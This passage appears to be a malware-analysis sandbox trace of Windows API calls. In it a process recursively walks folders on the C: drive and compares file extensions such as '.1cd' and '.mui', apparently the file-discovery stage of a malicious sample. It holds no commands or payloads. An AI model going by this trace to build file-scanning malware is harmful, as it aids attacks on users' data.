ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.898] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.898] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.899] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.899] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.899] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0033.899] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.901] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.901] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.901] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.901] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.901] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0033.902] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0034.441] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.442] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0034.442] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0034.442] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0034.442] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0034.442] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0034.442] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2eb0088 [0034.443] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0034.443] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.443] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0034.443] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0034.443] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0034.443] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0034.443] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2eb0088 [0034.444] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0034.542] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.542] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0034.542] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0034.542] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0034.542] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0034.542] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2eb0088 [0034.542] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0034.543] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.543] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0034.543] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0034.543] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0034.543] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0034.543] FindClose (in: hFindFile=0xba8b60 | out: hFindFile=0xba8b60) returned 1 [0034.543] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2ea0080 | out: hHeap=0xb10000) returned 1 [0034.543] FindNextFileW (in: hFindFile=0xba8b20, lpFindFileData=0x352fd00 | out: lpFindFileData=0x352fd00*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0034.543] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2ea0080 [0034.543] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8b60 [0034.544] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.544] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0034.544] FindClose (in: hFindFile=0xba8b60 | out: hFindFile=0xba8b60) returned 1 [0034.544] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2ea0080 | out: hHeap=0xb10000) returned 1 [0034.544] FindNextFileW (in: hFindFile=0xba8b20, lpFindFileData=0x352fd00 | out: lpFindFileData=0x352fd00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0034.544] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2ea0080 [0034.544] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="\x7db0\xbd\x16")) returned 0xffffffff [0034.545] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2ea0080 | out: hHeap=0xb10000) returned 1 [0034.545] FindNextFileW (in: hFindFile=0xba8b20, lpFindFileData=0x352fd00 | out: lpFindFileData=0x352fd00*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0034.545] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2ea0080 [0034.545] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8b60 [0034.545] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.545] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0034.545] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2eb0088 [0034.545] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0034.596] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.598] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0034.598] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x2ec1098 [0034.614] FindNextFileW (in: hFindFile=0xbf87e0, lpFindFileData=0x352f58c | out: lpFindFileData=0x352f58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.614] FindNextFileW (in: hFindFile=0xbf87e0, lpFindFileData=0x352f58c | out: lpFindFileData=0x352f58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0035.853] FindNextFileW (in: hFindFile=0x4232318, lpFindFileData=0x352ee18 | out: lpFindFileData=0x352ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58c6830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0036.109] FindNextFileW (in: hFindFile=0x42322d8, lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.109] FindNextFileW (in: hFindFile=0x42322d8, lpFindFileData=0x352f094 | out: lpFindFileData=0x352f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x140f5c00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x140f5c00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x166d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PAPYRUS.ELM", cAlternateFileName="")) returned 1 [0044.119] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x511e6c70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70959970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70959970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.119] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x352f310 | out: lpFindFileData=0x352f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e2a200, 